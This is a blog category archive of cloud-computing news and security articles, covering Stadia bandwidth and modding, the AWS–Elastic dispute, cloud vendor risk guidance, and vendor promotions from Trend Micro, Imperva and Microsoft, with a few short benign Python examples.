Category Archives: cloud

Streaming and Cloud Computing Endanger Modding and Game Preservation

Services like Google's Stadia seem convenient, but they could completely change the past and future of video games, writes Rich Whitehouse, a video game preservationist and veteran programmer in the video game industry. From the story: For most of today's games, modding isn't an especially friendly process. There are some exceptions, but for the most part, people like me are digging into these games and reverse engineering data formats in order to create tools which allow users to mod the games. Once that data starts only existing on a server somewhere, we can no longer see it, and we can no longer change it. I expect some publishers/developers to respond to this by explicitly supporting modifications in their games, but ultimately, this will come with limitations and, most likely, censorship. As such, this represents the end of an era in which we're free to dig into these games and make whatever we want out of them. As someone who got their start in game development through modding, I think this sucks. It is also arguably not a healthy direction for the video game industry to head in. Dota 2, Counter-Strike, and other massively popular games that generate millions of dollars annually all got their start as user modifications of existing video games from big publishers. Will we still get the new Counter-Strike if users can't mod their games? [...] The bigger problem here, as I see it, is analysis and preservation. There is so much more history to a video game than the playable end result conveys. When the data and code driving a game exist only on a remote server, we can't look at them, and we can't learn from them. Reverse engineering a game gives us tons of insight into its development, from lost and hidden features to actual development decisions. Indeed, even with optimizing compilers and well-defined dependency trees which help to cull unused data out of retail builds, many of the popular major releases of today have plenty waiting to be discovered and documented. We're already living in a world where the story of a game's development remains largely hidden from the public, and the bits that trickle out through presentations and conferences are well-filtered, often omitting important information merely because it might not be well-received, might make the developer look bad, and so on. This ultimately offers up a deeply flawed, relatively sparse historical record.

Read more of this story at Slashdot.

Is the Private or Public Cloud Right for Your Business?

It wasn’t very long ago that cloud computing was a niche field that only the most advanced organizations were dabbling with. Now the cloud is very much mainstream, and it is rare to find a business that uses IT but doesn’t rely on the cloud for part of its infrastructure. But if […]… Read More

The post Is the Private or Public Cloud Right for Your Business? appeared first on The State of Security.

Why Google Stadia Will Be a Major Problem For Many American Players

Earlier today, Google launched its long-awaited "Stadia" cloud gaming service at the Game Developers Conference in San Francisco. Unlike services from Xbox, PlayStation, and Nintendo, Stadia is powered by Google's worldwide data centers, allowing users to play games across a variety of platforms -- browsers, computers, TVs, and mobile devices -- all via the internet at 4K resolution. One major problem with Stadia, which Google didn't mention in its presentation, is that it will require a ton of bandwidth, testing the limits of the data caps that most U.S. internet service providers impose. "Most US ISPs cap their customers' bandwidth usage, usually somewhere in the neighborhood of 300 GB per month. And streaming 4K content eats up about 7GB an hour," Steve Bowling from YouTube gaming channel GameXplain tweeted. "And that's based on Netflix's publicly available guidelines for 4K video content, which is shot at 24 fps, a far cry from 60fps, meaning content at 4K60 could be more costly." He added: "Your average consumer likely isn't rocking a 100Mbps+ connection, and in some parts of America such options aren't even available, limiting Stadia's potential reach. And if you are, that cap can come at you fast, especially considering most folks are going to use their internet for more than just streaming games. Most ISPs offer additional data at a premium, but how many are going to want to pay that premium to stream 4K games?" What's unknown is whether or not Google will work with ISPs to help alleviate this concern. PCWorld also notes that there's no option to download and install a game if you want, which is an option available on Steam's streaming service. "You're always streaming it, and presumably copies sold through the Google Play store won't come with more traditional versions from other storefronts," reports PCWorld. "You're either all-in on Stadia and streaming or you're not." UPDATE: A Google spokesperson told Kotaku they were able to deliver 1080p, 60 FPS gameplay for users with 25 Mbps connections. They also said that they expect Stadia to deliver 4K, 60 FPS for people with "approximately the same bandwidth requirements." How exactly they will achieve this is still unclear.
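
As a rough sanity check on those numbers, here is a back-of-the-envelope sketch in Python. The 7 GB/hour figure for 4K at 24 fps, the ~300 GB cap, and Google's 25 Mbps claim all come from the quotes above; the assumption that data use scales linearly with frame rate is my own simplification, not anything Google or Netflix has published.

# Back-of-the-envelope Stadia data-usage estimates (figures from the story).
CAP_GB = 300.0                                   # typical monthly data cap
GB_PER_HOUR_4K24 = 7.0                           # Netflix 4K guideline, 24 fps
GB_PER_HOUR_4K60 = GB_PER_HOUR_4K24 * 60 / 24    # assumed linear fps scaling

def mbps_to_gb_per_hour(mbps):
    # megabits/second -> gigabytes/hour
    return mbps * 1e6 * 3600 / 8 / 1e9

print(f"4K24: cap reached after {CAP_GB / GB_PER_HOUR_4K24:.0f} hours")            # ~43 h
print(f"4K60 (assumed): cap reached after {CAP_GB / GB_PER_HOUR_4K60:.0f} hours")  # ~17 h
print(f"25 Mbps sustained is {mbps_to_gb_per_hour(25):.1f} GB/hour")               # ~11.3 GB/h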

Read more of this story at Slashdot.

How to manage the double-edged sword of the cloud

The digital transformation that’s sweeping across many different industries is one that requires rich, timely data to enable organisations and businesses. The critical need to embrace digital transformation is

The post How to manage the double-edged sword of the cloud appeared first on The Cyber Security Place.

Some Companies Choose Microsoft’s Cloud Service Because They’re Afraid of Amazon

"In the cloud wars, Microsoft has been able to win big business from retailers, largely because companies like Walmart, Kroger, Gap and Target are opting not to write big checks to rival Amazon," reports CNBC: The more Amazon grows, the more that calculation could start working its way into other industries -- like automotive. In a recent interview with CNBC, Volkswagen's Heiko Huttel, who runs the company's connected car division, said the carmaker chose Microsoft Azure late last year for its "Automotive Cloud" project after considering Amazon Web Services... "If I take a look at all the competitors out there, you see they have capabilities in disrupting you at the customer interface," Hüttel said. "Then you have to carefully choose who is really getting down into the car, where you open up a lot of data to these people, and then you have to carefully choose with whom you are doing business." Microsoft likes to tout the merits of its cloud technology, but the company is fully aware that taking on AWS, which has a commanding lead in the cloud infrastructure market, isn't just about offering the best services... Microsoft doesn't break out Azure revenue, but analysts at Morgan Stanley estimate that it accounted for almost 10 percent of sales in the latest quarter.

Read more of this story at Slashdot.

Is Amazon’s AWS Approaching ‘War’ for Control of Elasticsearch?

Long-time Slashdot reader jasenj1 and Striek both shared news of a growing open source controversy. "Amazon Web Services on Monday announced that it's partnering with Netflix and Expedia to champion a new Open Distro for Elasticsearch due to concerns of proprietary code being mixed into the open source Elasticsearch project," reports Datanami. "Elastic, the company behind Elasticsearch, responded by accusing Amazon of copying code, inserting bugs into the community code, and engaging with the company under false pretenses..." In a blog post, Adrian Cockcroft, the vice president of cloud architecture strategy for AWS, says the new project is a "value added" distribution that's 100% open source, and that developers working on it will contribute any improvements or fixes back to the upstream Elasticsearch project. "The new advanced features of Open Distro for Elasticsearch are all Apache 2.0 licensed," Cockcroft writes. "With the first release, our goal is to address many critical features missing from open source Elasticsearch, such as security, event monitoring and alerting, and SQL support...." Cockcroft says there's no clear documentation in the Elasticsearch release notes over what's open source and what's proprietary. "Enterprise developers may inadvertently apply a fix or enhancement to the proprietary source code," he wrote. "This is hard to track and govern, could lead to breach of license, and could lead to immediate termination of rights (for both proprietary free and paid)." Elastic CEO Shay Banon responded Tuesday to AWS in a blog post, in which he leveled a variety of accusations at the cloud giant. "Our products were forked, redistributed and rebundled so many times I lost count," Banon wrote. "There was always a 'reason' [for the forks, redistributions, and rebundling], at times masked with fake altruism or benevolence. None of these have lasted. They were built to serve their own needs, drive confusion, and splinter the community." Elastic's commercial code may have provided an "inspiration" for others to follow, Banon wrote, but that inspiration didn't necessarily make for clean code. "It has been bluntly copied by various companies and even found its way back to certain distributions or forks, like the freshly minted Amazon one, sadly, painfully, with critical bugs," he wrote.

Read more of this story at Slashdot.

Are Shadow Cloud Services Undermining Your Security Efforts?

The Great Cloud Migration continues around the world, forging new pathways to digital transformation by way of data analytics, on-demand computing power, and agile scalability. If you’ve undertaken this journey,

The post Are Shadow Cloud Services Undermining Your Security Efforts? appeared first on The Cyber Security Place.

Moving from traditional on-premise solutions to cloud-based security

In this Help Net Security podcast recorded at RSA Conference 2019, Gary Marsden, Senior Director, Data Protection Services at Gemalto, talks about the feedback they’re getting from the market and how Gemalto

The post Moving from traditional on-premise solutions to cloud-based security appeared first on The Cyber Security Place.

Thoughts on Cloud Security

Recently I've been reading about cloud security and security with respect to DevOps. I'll say more about the excellent book I'm reading, but I had a moment of déjà vu during one section.

The book described how cloud security is a big change from enterprise security because it relies less on IP-address-centric controls and more on users and groups. The book talked about creating security groups, and adding users to those groups in order to control their access and capabilities.
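
For the cloud flavor of that pattern, here is a minimal sketch using AWS IAM via boto3; the group, user, and policy names are hypothetical, and this is just one provider's take on user- and group-centric control rather than anything from the book.

import boto3

iam = boto3.client("iam")

# Create a group, attach a managed policy that defines its capabilities,
# then add a user: access now follows group membership, not IP addresses.
iam.create_group(GroupName="analysts")                    # hypothetical group
iam.attach_group_policy(
    GroupName="analysts",
    PolicyArn="arn:aws:iam::aws:policy/ReadOnlyAccess",   # AWS managed policy
)
iam.create_user(UserName="jdoe")                          # hypothetical user
iam.add_user_to_group(GroupName="analysts", UserName="jdoe")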

As I read that passage, it reminded me of a time long ago, in the late 1990s, when I was studying for the MCSE, then called the Microsoft Certified Systems Engineer certification. I read Tom Sheldon's Windows NT Security Handbook, published in 1996. It described the exact same security process of creating security groups and adding users. This was core to the new NT 4 role-based access control (RBAC) implementation.

Now, fast forward a few years, or all the way to today, and consider the security challenges facing the majority of legacy enterprises: securing Windows assets and the data they store and access. How could this wonderful security model, based on decades of experience (from the 1960s and 1970s no less), have failed to work in operational environments?

There are many reasons one could cite, but I think the following are at least worthy of mention.

The systems enforcing the security model are exposed to intruders.

Furthermore:

Intruders are generally able to gain code execution on systems participating in the security model.

Finally:

Intruders have access to the network traffic which partially contains elements of the security model.

From these weaknesses, a large portion of the security countermeasures of the last two decades have been derived as compensating controls and visibility requirements.

The question then becomes:

Does this change with the cloud?

In brief, I believe the answer is largely "yes," thankfully. Generally, the systems upon which the security model is being enforced are not able to access the enforcement mechanism, thanks to the wonders of virtualization.

Should an intruder find a way to escape from their restricted cloud platform and gain hypervisor or management network access, then they find themselves in a situation similar to the average Windows domain network.

This realization puts a heavy burden on the cloud infrastructure operators. The major players are likely able to acquire and apply the expertise and resources to make their infrastructure far more resilient and survivable than their enterprise counterparts.

The weakness will likely be their personnel.

Once the compute and network components are sufficiently robust from externally sourced compromise, then internal threats become the next most cost-effective and return-producing vectors for dedicated intruders.

Is there anything users can do as they hand their compute and data assets to cloud operators?

I suggest four moves.

First, small- to mid-sized cloud infrastructure users will likely have to piggyback or free-ride on the initiatives and influence of the largest cloud customers, who have the clout and hopefully the expertise to hold the cloud operators responsible for the security of everyone's data.

Second, lawmakers may need to provide improved whistleblower protection for cloud employees who feel threatened by revealing material weaknesses they encounter while doing their jobs.

Third, government regulators will have to ensure that no cloud provider assumes a monopoly, and that no two providers form a duopoly. We may end up with three major players and a smattering of smaller ones, as is the case in many mature industries.

Fourth, users should use every means at their disposal to select cloud operators not only on their compute features, but on their security and visibility features. The more logging and visibility exposed by the cloud provider, the better. I am excited by new features like the Azure network tap and hope to see equivalent features in other cloud infrastructure.

Remember that security has two main functions: planning/resistance, to try to stop bad things from happening, and detection/response, to handle the failures that inevitably happen. "Prevention eventually fails" is one of my long-time mantras. We don't want prevention to fail silently in the cloud. We need ways to know that failure is happening so that we can plan and implement new resistance mechanisms, and then validate their effectiveness via detection and response.

Update: I forgot to mention that the material above assumed that the cloud users and operators made no unintentional configuration mistakes. If users or operators introduce exposures or vulnerabilities, then those will be the weaknesses that intruders exploit. We've already seen a lot of this happening and it appears to be the most common problem. Procedures and tools which constantly assess cloud configurations for exposures and vulnerabilities due to misconfiguration or poor practices are a fifth move which all involved should make.

A corollary is that complexity can drive problems. When the cloud infrastructure offers too many knobs to turn, then it's likely the users and operators will believe they are taking one action when in reality they are implementing another.
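
As one small, hedged illustration of that fifth move, the sketch below uses boto3 to flag S3 buckets whose ACLs grant access to everyone. It is a toy check, assuming you have list and read-ACL permissions, not a substitute for a real configuration-assessment tool.

import boto3

s3 = boto3.client("s3")
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

# Flag buckets whose ACL grants any permission to all users: a common,
# easily introduced misconfiguration of the kind discussed above.
for bucket in s3.list_buckets()["Buckets"]:
    acl = s3.get_bucket_acl(Bucket=bucket["Name"])
    for grant in acl["Grants"]:
        if grant.get("Grantee", {}).get("URI") in PUBLIC_GROUPS:
            print(f"PUBLIC: {bucket['Name']} grants {grant['Permission']}")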

Why You Need to Align Your Cloud Strategy to Your Business Goals

Your company has decided to adopt the Cloud – or maybe it was among the first ones that decided to rely on virtualized environments before it was even a thing. In either case, cloud security has to be managed. How do you go about that? Before checking out vendor marketing materials in search of the […]… Read More

The post Why You Need to Align Your Cloud Strategy to Your Business Goals appeared first on The State of Security.

Security Considerations for Whatever Cloud Service Model You Adopt

Companies recognize the strategic importance of adopting a cloud service model to transform their operations, but there still needs to be a focus on mitigating potential information risks with appropriate cloud security considerations, controls and requirements without compromising functionality, ease of use or the pace of adoption. We all worry about security in our business and personal lives, so it’s naturally a persistent concern when adopting cloud-based services — and understandably so. However, research suggests that cloud services are now a mainstream way of delivering IT requirements for many companies today and will continue to grow in spite of any unease about security.

According to Gartner, 28 percent of spending within key enterprise IT markets will shift to the cloud by 2022, which is up from 19 percent in 2018. Meanwhile, Forrester reported that cloud platforms and applications now drive the full spectrum of end-to-end business technology transformations in leading enterprises, from the key systems powering the back office to mobile apps delivering new customer experiences. More enterprises are using multiple cloud services each year, including software-as-a-service (SaaS) business apps and cloud platforms such as infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS), both on-premises and from public service providers.

What Is Your Cloud Security Readiness Posture?

The state of security readiness for cloud service adoption varies between companies, but many still lack the oversight and decision-making processes necessary for such a migration. There is a greater need for alignment and governance processes to manage and oversee a cloud vendor relationship. This represents a shift in responsibilities, so companies need to adequately staff, manage and maintain the appropriate level of oversight and control over the cloud service. As a result, a security governance and management model for cloud services is essential, and it can be embodied in a cloud vendor risk management program.

A cloud vendor risk management program requires careful consideration and implementation, but not a complete overhaul of your company’s entire cybersecurity program. The activities in the cloud vendor risk management program are intended to assist companies in approaching security in a consistent manner, regardless of how varied or unique the cloud service may be. The use of standard methods helps ensure there is reliable information on which to base decisions and actions. It also reinforces the ability to proactively evaluate and mitigate the risks cloud vendors introduce to the business. Finally, standard cloud vendor risk management methods can help distinguish between different types of risks and manage them appropriately.

Overlooked Security Considerations for Your Cloud Service Model

A cloud vendor risk management program provides a tailored set of security considerations, controls and requirements within a cloud computing environment through a phased life cycle approach. Determining cloud security considerations, controls and requirements is an ongoing analytical activity to evaluate the cloud service models and potential cloud vendors that can satisfy existing or emerging business needs.

All cloud security controls and requirements possess a certain level of importance based on risk, and most are applicable regardless of the cloud service. However, some elements are overlooked more often than others, and companies should pay particular attention to the following considerations to protect their cloud service model and the data therein.

Application Security

  • Application exposure: Consider the cloud vendor application’s overall attack surface. In a SaaS cloud environment, the applications offered by the cloud vendor often have broader exposure, which increases the attack surface. Additionally, those applications often still need to integrate back to other noncloud applications within the boundaries of your company or the cloud vendor enterprise.
  • Application mapping: Ensure that applications are aligned with the capabilities provided by cloud vendors to avoid the introduction of any undesirable features or vulnerabilities.
  • Application design: Pay close attention to the design and requirements of an application candidate and request a test period from the cloud vendor to rule out any possible issues. Require continuous communication and notification of major changes to ensure that compatibility testing is included in the change plans. SaaS cloud vendors will typically introduce additional features to improve the resilience of their software, such as security testing or strict versioning. Cloud vendors can also inform your company about the exact state of its business applications, such as specific software logging and monitoring, given their dedicated attention to managing reputation risk and reliance on providing secure software services and capabilities.
  • Browser vulnerabilities: Harden web browsers and browser clients. Applications offered by SaaS cloud vendors are accessible via secure communication through a web browser, which is a common target for malware and attacks.
  • Service-oriented architecture (SOA): By using the vendor-provided SOA library, you can develop and test applications more quickly, because SOA provides a common framework for application development. However, the SOA libraries are maintained by the cloud vendor and are not completely visible to your company, so conduct ongoing assessments to continuously identify any application vulnerabilities.

Data Governance

  • Data ownership: Clearly define data ownership so the cloud vendor cannot refuse access to data or demand fees to return the data once the service contracts are terminated. SaaS cloud vendors will provide the applications and your company will provide the data.
  • Data disposal: Consider the options for safe disposal or destruction of any previous backups. Proper disposal of data is imperative to prevent unauthorized disclosure. Replace, recycle or upgrade disks with proper sanitization so that the information no longer remains within storage and cannot be retrieved. Ensure that the cloud vendor takes appropriate measures to prevent information assets from being sent without approval to countries where the data can be disclosed legally.
  • Data disposal upon contract termination: Implement processes to erase, sanitize and/or dispose of data migrated into the cloud vendor’s application prior to a contract termination. Ensure the details of applications are not disclosed without your company’s authorization.
  • Data encryption transmission requirements: Encrypt confidential data communicated between a user’s browser and a web-based application using secure protocols. Encrypt confidential data transmitted between an application server and a database to prevent unauthorized interception; such encryption capabilities are generally provided as part of, or as an option to, the database server software. You can protect confidential file transfers through protocols such as Secure FTP (SFTP) or by encrypting the data prior to transmission, as sketched after this list.
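
As a minimal sketch of encrypting data prior to transmission, the snippet below uses the Python cryptography library's Fernet recipe. The file names are illustrative only, and a real deployment would retrieve the key from a key management service rather than generate it inline.

from cryptography.fernet import Fernet

# In practice, fetch this key from a KMS/HSM; generated here for brevity.
key = Fernet.generate_key()
f = Fernet(key)

# Encrypt the payload before it leaves your environment, then transfer
# the ciphertext over SFTP or any other channel.
with open("report.csv", "rb") as src:        # illustrative file name
    ciphertext = f.encrypt(src.read())
with open("report.csv.enc", "wb") as dst:
    dst.write(ciphertext)

# The receiving side decrypts with the same key.
plaintext = f.decrypt(ciphertext)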

Contract Management

  • Transborder legal requirements: Validate whether government entities in the hosting country require access to your company’s information, with or without proper notification. Implement necessary compliance controls and do not violate regulations in other countries when storing or transmitting data within the cloud vendor’s infrastructure. Different countries have different legal requirements, especially concerning personally identifiable information (PII).
  • Multitenancy: Segment and protect all resources allocated to a particular tenant to avoid disclosure of information to other tenants. For example, when a customer no longer needs allocated storage, it may be freely reallocated to another customer. In this case, wipe data thoroughly.
  • Network management: Determine network management roles and responsibilities with the cloud vendor. Within a SaaS implementation, the cloud vendor is entirely responsible for the network. In other models, the responsibility of the network is generally shared, but there will be exceptions.
  • Reliability: Ensure the cloud vendor has service-level agreements that specify the amount of allowable downtime and the time it will take to restore service in the event of an unexpected disruption.
  • Exit strategy: Develop an exit strategy for the eventual transition away from the cloud vendor, considering tools, procedures and other offerings that securely facilitate data or service portability from one cloud vendor to another or bring services back in-house.

IT Asset Governance

  • Patch management: Determine the patch management processes with the cloud vendor and ensure there is ongoing awareness and reporting. Cloud vendors can introduce patches in their applications quickly without the approval or knowledge of your company because it can take a long time for a cloud vendor to get formal approval from every customer. This can result in your company having little control or insight regarding the patch management process and lead to unexpected side effects. Ensure that the cloud vendor hypervisor manager allows the necessary patches to be applied across the infrastructure in a short time, reducing the time available for a new vulnerability to be exploited.
  • Virtual machine security maintenance: Partner with cloud vendors that allow your company to create virtual machines (VM) in various states such as active, running, suspended and off. Although cloud vendors could be involved, the maintenance of security updates may be the responsibility of your company. Assess all inactive VMs and apply security patches to reduce the potential for out-of-date VMs to become compromised when activated.

Accelerate Your Cloud Transformation

Adopting cloud services can be a key steppingstone toward achieving your business objectives. Many companies have gained substantial value from cloud services, but there is still work to be done. Even successful companies often have cloud security gaps, including issues related to cloud security governance and management. Although it may not be easy, it’s critical to perform due diligence to address any gaps through a cloud vendor risk management program.

Cloud service security levels will vary, and security concerns will always be a part of any company’s transition to the cloud. But implementing a cloud vendor risk management program can certainly put your company in a better position to address these concerns. The bottom line is that security is no longer an acceptable reason for refusing to adopt cloud services, and the days when your business can keep up without them are officially over.

The post Security Considerations for Whatever Cloud Service Model You Adopt appeared first on Security Intelligence.

Shifting Left Is a Lie… Sort of

It would be hard to be involved in technology in any way and not see the dramatic upward trend in DevOps adoption. In its January 2019 publication “Five Key Trends To Benchmark DevOps Progress,” Forrester Research found that 56 percent of firms were ‘implementing, implemented or expanding’ DevOps. Further, 51 percent of adopters have embraced […]… Read More

The post Shifting Left Is a Lie… Sort of appeared first on The State of Security.

Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples

Since the release of the “Trend Micro Cloud App Security 2017 Report” about a year ago, threats using email as the delivery vector have grown significantly. Business Email Compromise (BEC) scams had already caused USD $12.5 billion in global losses as of 2018 – a 136.4% increase from the $5.3 billion reported in 2017. The popularity of Office 365 has made it an attractive target for cybercriminals.

In January 2019, the U.S. Secret Service issued a bulletin calling out phishing attacks that specifically target organizations using Office 365.

Trend Micro™ Cloud App Security™ is an API-based service protecting Microsoft® Office 365™ Exchange™ Online, OneDrive® for Business, and SharePoint® Online platforms. Using multiple advanced threat protection techniques, it acts as a second layer of protection after emails and files have passed through Office 365 scanning.

In 2018, Cloud App Security caught 8.9 million high-risk email threats missed by Office 365 security. Those threats include one million malware files, 7.7 million phishing attempts, and 103,955 BEC attempts. Each of the blocked threats represents a potential attack that could result in monetary and productivity losses. For example, the average cost per BEC incident is now USD $159,000. Blocking 103,000 BEC attacks means potentially saving our customers $16 billion!
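
As a quick check on that headline claim (a sketch using only the figures quoted above):

# Rough check of the savings estimate: blocked BEC attempts x average cost.
bec_blocked = 103_955          # BEC attempts caught in 2018
cost_per_incident = 159_000    # average cost per BEC incident, USD
print(f"${bec_blocked * cost_per_incident / 1e9:.1f} billion")   # ~$16.5 billion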

No matter which Office 365 plan they use, and whether or not a third-party email gateway is deployed, customers still stop a significant number of potentially damaging threats with Trend Micro Cloud App Security.

Customer examples: Additional detections after Office 365 built-in security (2018 data)

Customers relying on Office 365 built-in security saw obvious value from deploying Trend Micro Cloud App Security. For example, an internet company with 10,000 Office 365 E3 users found an additional 16,000 malware files, 232,000 malicious URLs, 174,000 phishing emails, and 2,000 BEC attacks in 2018.

Customer examples: Additional Detections after Office 365 Advanced Threat Protection (2018 data)

Customers using Office 365 Advanced Threat Protection (ATP) also need an additional layer of filtering. A logistics company with 80,000 users of E3 and ATP detected an additional 28,000 malware files and 662,000 malicious URLs in 2018 with Trend Micro Cloud App Security.

Customer examples: Additional Detections after third-party email gateway and Office 365 built-in security (2018 data)

Many customers use a third-party email gateway to scan emails before they’re delivered to their Office 365 environment. Despite these gateway deployments, many of the sneakiest and hardest-to-detect threats still slipped through. Plus, a gateway solution can’t detect internal email threats, which can originate from compromised devices or accounts within Office 365.

For example, a business with 120,000 Office 365 users with a third-party email gateway stopped an additional 166,823 phishing emails, 237,222 malicious URLs, 78,246 known and unknown malware, and 1,645 BEC emails with Cloud App Security.

Innovative technologies to combat new email threats 

Continuous innovation is one key reason why Trend Micro is able to catch so many threats missed by Office 365 and/or third-party email gateways. In 2018, two new advanced features were introduced by Cloud App Security to help businesses stay protected from advanced email threats.

The first is Writing Style DNA, an artificial intelligence (AI)-powered technology that can help detect email impersonation tactics used in BEC scams. It uses AI to recognize a user’s writing style based on past emails and then compares it to suspected forgeries.
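
Trend Micro has not published the internals of Writing Style DNA, but as a rough, hypothetical illustration of the general idea, one can compare character n-gram profiles of a suspect email against a user's known mail, for example with scikit-learn:

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Known-good emails from the executive being impersonated (toy data).
known = [
    "Hi team, please see the attached report and send feedback by Friday.",
    "Thanks all. Let's sync on the quarterly numbers tomorrow morning.",
]
suspect = "URGENT!!! wire $45,000 to this acct immediately, do not call me."

# Character n-grams capture stylistic habits (punctuation, word endings)
# better than whole words do on short texts.
vec = TfidfVectorizer(analyzer="char_wb", ngram_range=(2, 4))
matrix = vec.fit_transform(known + [suspect])

score = cosine_similarity(matrix[-1], matrix[:-1]).max()
print(f"style similarity: {score:.2f}")   # a low score would flag the email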

The second technology combines AI and computer vision to help detect and block credential-phishing attempts in real time, especially now that more schemes use fake, legitimate-looking login webpages to deceive email users. The tool checks a login page’s branded elements, login form, and other website components to determine whether the page is legitimate.
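
Again, the production system is proprietary; as a hypothetical sketch of catching visual look-alikes, one could compare perceptual hashes of a rendered login page against a brand's genuine page (the Pillow and imagehash packages, and the screenshot files, are assumptions here):

from PIL import Image
import imagehash

# Perceptual hashes stay similar under small visual changes, so a close
# copy of a brand's login page hashes near the original.
genuine = imagehash.phash(Image.open("office365_login.png"))   # assumed file
suspect = imagehash.phash(Image.open("suspect_page.png"))      # assumed file

distance = genuine - suspect       # Hamming distance between the hashes
if distance <= 8:                  # threshold chosen arbitrarily here
    print("Page imitates the brand; verify the serving domain before trusting it.")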

Additionally, Trend Micro uniquely offers a pre-execution machine learning engine to find unknown malware in addition to its award-winning Deep Discovery sandbox technology. The pre-execution machine learning engine provides better threat coverage while improving email delivery by finding threats before the sandbox layer.

Check out the Trend Micro Cloud App Security 2018 Report to get more details on the type of threats blocked by this product and common email attacks analyzed by Trend Micro Research in 2018.

The post Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples appeared first on .

Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise.

Is your enterprise in the midst of a digital transformation? Of course it is. Doing business in today’s global marketplace is more competitive than ever. Automating your business processes and infusing them with always-on, real-time applications and other cutting-edge technology is key to keeping your customers happy, attracting and retaining good workers, transacting with your partners, and growing your business.

A transformation this sweeping doesn’t happen overnight, though. Mission-critical applications and processes can’t be swapped for new ones without risk to your bottom line. While all enterprises are moving to hosted applications or virtualized software hosted on Infrastructure as a Service (IaaS) platforms such as AWS or Microsoft Azure, the reality is that it will take many years for them to become all cloud — if ever.

In other words, many, if not most, enterprises have a hybrid IT infrastructure. And that’s not going to change for many years.

In the meantime, you need security strong enough to protect your business and agile enough to cover your transforming infrastructure. That’s why Imperva has introduced a simpler way for organizations to deploy our family of security products and services, which we call FlexProtect. FlexProtect comes in three different plans: FlexProtect Pro, FlexProtect Plus, and FlexProtect Premier.

With the FlexProtect Plus and Premier plans, our analyst-recognized application and data security solutions protect your applications and data even as you migrate them from on-premises data centers to multiple cloud providers. Don’t let complicated, inflexible security licenses slow down your cloud migration. FlexProtect provides simple and predictable licensing that covers your entire IT infrastructure, even if you use multiple clouds for IaaS, and even as you move workloads between on-premises and clouds. With our powerful security analytics solutions available in all FlexProtect plans, you also have the visibility and control you need to help you manage your security wherever your assets are.

Imperva also offers a third option, FlexProtect Pro. This brings together five powerful SaaS-based Application Security capabilities to protect your edge from attack: Cloud WAF, Bot Protection, IP Reputation Intelligence, our Content Delivery Network (CDN), and our powerful Attack Analytics solution, which turns events into insights you can act on. FlexProtect Pro gives businesses simple application security delivered completely as a service.

Imperva is in the midst of its own transformation — learn more about the New Imperva here. That gives us keen insight into the challenges with which our customers are grappling. And that’s why we developed FlexProtect licensing, in order to better defend your business and its growth, wherever you are on your digital transformation journey. You’ll never have to choose between innovating for your customers and protecting what matters.

To learn more about FlexProtect, meet us at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and hear directly from Imperva experts. You can also see a demo of our latest products in the areas of cloud app and data security and data risk analytics.

Imperva will also be at the AWS booth (1227 in the South Expo hall), where on Tuesday, March 5th from 3:30 – 4:00 pm you’ll be able to hear how one of our cloud customers, a U.S.-based non-profit with nearly 40 million members, uses Imperva Autonomous Application Protection (AAP) to detect and mitigate potential application attacks. You can also see a demo of how our solutions work in cloud environments on Tuesday, March 5th, 3:30-5 pm and Wednesday, March 6th, 11:30 am-2 pm.

Finally — I will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” during RSA. It will be broadcast live at 9:30 am on March 6th and feature a Q&A discussion with several cybersecurity executives as they discuss the possibility of a cyber battle between AI systems, which some experts predict might be on the horizon in the next three to five years. Register and watch the live feed or recording for free!

The post Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise. appeared first on Blog.

Inspired and powered by partners

$32 billion in revenue. That’s an incredible number that Satya Nadella and Amy Hood shared during the Q2 earnings call last week. Just as impressive is the commercial cloud revenue increase of 48 percent year-over-year to $9 billion. Did you know that 95 percent of Microsoft’s commercial revenue flows directly through our partner ecosystem? With more than 7,500 partners joining that ecosystem every month, partner growth and partner innovation are directly fueling our commercial cloud growth. One accelerant, the IP co-sell program, now has thousands of co-sell ready partners that generated an incredible $8 billion in contracted partner revenue since the program began in July 2017.

It’s exciting to see the success of our partners, and to know we are collaborating with businesses of all types and sizes wherever there is opportunity. We’re working together with partners old and new to help them build their own digital capability to compete and grow. We’ve doubled down on our partnership with Accenture and Avanade, creating the new Accenture Microsoft Business Group to help customers overcome disruption and lead transformation in their industries. We’re partnering in new ways with customers like Kroger to bring their new Retail as a Service solution built on Azure, to use in their stores – and to sell to other retailers.

Part of Microsoft’s digital transformation is moving beyond transactional reselling via partners, to a true partnership philosophy where we’re working together to develop and sell each other’s technology and solutions. Our partners are building on our technology, collaborating with partners across borders to build repeatable solutions, and creating new revenue opportunities that didn’t exist in the past. We focus as much on selling third-party solutions as our own, and the speed of the cloud enables all of us to accelerate value to our customers.

I want to share more with you about how hundreds of thousands of Microsoft partners are powering customer innovation, and how we are evolving our partnership strategy in order to drive tech intensity for customers around the world.

Partner success and momentum

With hundreds of thousands of partners across the world, our partner ecosystem is stronger than ever.

CSP: Through our Cloud Solution Provider (CSP) program, our fastest-growing licensing model, partners are embedding Microsoft technologies into their own solutions and delivering more differentiated, long-term value for customers. The number of partners transacting through CSP is up 52 percent, and they are serving more than 2 million customers.

Azure Expert MSP: The Azure Expert MSP program has grown to 43 partners that deliver consistent, repeatable, high-fidelity managed services on Azure and are driving more than $100,000 per month in Azure consumption. A big part of this volume is in migration services, as SQL Server 2008 phases out this summer, followed by Windows Server 2008 a year from now. The opportunity for partners can’t be overstated. Our estimates put the opportunity around $50 billion for partners to help customers move their existing on-premises workloads to Azure and start capitalizing on the benefits of the cloud.

IP Co-Sell: Our industry-leading IP co-sell program that rewards Microsoft sellers for selling third-party solutions is a runaway success, generating $8 billion in contracted partner revenue since July 2017. Our partners are reaping the benefits, seeing co-sell deals that close nearly three times faster, projects that are nearly six times larger, and six times more Azure consumption.

Building the largest commercial marketplace

